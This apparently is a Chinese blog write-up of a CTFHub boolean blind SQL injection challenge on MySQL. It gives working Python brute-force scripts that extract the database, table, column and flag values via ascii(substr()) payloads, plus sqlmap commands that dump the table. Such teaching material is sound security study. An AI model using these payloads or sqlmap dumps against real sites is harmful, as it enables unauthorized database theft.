title: 布尔盲注
布尔盲注
题目考点
布尔盲注
MySQL
解题思路
确认该题是布尔盲注
尝试根据题目输入看返回的参数,发现返回是query_success
http://challenge-67107524c1e16708.sandbox.ctfhub.com:10800/?id=1
方法一:python脚本暴力破解
爆破数据库名称
1、判断数据库名称长度
使用length函数确认数据库长度,直到查询返回query_success
http://challenge-67107524c1e16708.sandbox.ctfhub.com:10800/?id=1+and+length%28database%28%29%29%3D4
2、使用mysql语法中的ascii()函数与substr()函数进行编写python脚本爆破得知数据库名
http://challenge-67107524c1e16708.sandbox.ctfhub.com:10800/?id=0 or ascii(substr((select database()),1,1))=65--+
例如上述的请求就是在爆破数据库名,判断数据库名的第一位是否为A 以此规则来爆破
用两个for循环第一个i变量代表被爆破的数据库名字的第几位(根据第一步方法对i进行取值增加效率),第二个j变量代表ascill码中的可见字符
import requests url = "http://challenge-67107524c1e16708.sandbox.ctfhub.com:10800/?id=0 or ascii(substr((select database()),%s,1))=%d--+" result = "" for i in range(1,5): for j in range(33,127): payload = url%(i,j) try: s = requests.get(url=payload, timeout=5) if "query_success" in s.text: result += chr(j) print(result) break except Exception as e: print("请求出错:", e) continue print(result)爆破脚本得出数据库名
爆破数据表名称
1、使用python脚本爆破表名
import requests result = "" url = "http://challenge-67107524c1e16708.sandbox.ctfhub.com:10800/?id=0 or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli'),%s,1))=%d--+" for i in range(1,100): if len(result)+1 < i: break for j in range(33,127): payload = url%(i,j) try: s = requests.get(url=payload, timeout=5) if "query_success" in s.text: result += chr(j) print(result) break except Exception as e: print("请求出错:", e) continue print(result)爆破得出数据表名(看到出现了两张表,我们根据表名可以先猜测f题目要求的flag在flag表中)
爆破数据表中字段
1、使用python脚本爆破字段名(原理是一样的)
import requests result = "" url = "http://challenge-67107524c1e16708.sandbox.ctfhub.com:10800/?id=0 or ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),%s,1))=%d--+" for i in range(1,100): if len(result)+1 < i: break for j in range(33,127): payload = url%(i,j) try: s = requests.get(url=payload, timeout=5) if "query_success" in s.text: result += chr(j) print(result) break except Exception as e: print("请求出错:", e) continue print(result)爆破得出字段名
最后爆破数据表中数据
import requests result = "" url = "http://challenge-67107524c1e16708.sandbox.ctfhub.com:10800/?id=0 or ascii(substr((select group_concat(flag) from flag),%s,1))=%d--+" for i in range(1,100): if len(result)+1 < i: break for j in range(33,127): payload = url%(i,j) try: s = requests.get(url=payload, timeout=5) if "query_success" in s.text: result += chr(j) print(result) break except Exception as e: print("请求出错:", e) continue print(result)爆破得出最终的flag
方法二:使用sqlmp注入
爆破当前网站使用数据库名称(--current-db爆破当前网站使用数据库名称)
python sqlmap.py -u http://challenge-67107524c1e16708.sandbox.ctfhub.com:10800/?id=1 --current-db --batch
爆破数据表名称(--tables爆破指定数据库下有哪些数据表)
python sqlmap.py -u http://challenge-67107524c1e16708.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables --batch
爆破得出数据表名(看到出现了两张表,我们根据表名可以先猜测f题目要求的flag在flag表中)
爆破数据表字段(--columns爆破指定数据表下有哪些字段)
python sqlmap.py -u http://challenge-67107524c1e16708.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns --batch
最后根据获得字段直接获取该表数据(--dump)
python sqlmap.py -u http://challenge-67107524c1e16708.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump --batch
第一次写博客有哪里写的不好的望大家见谅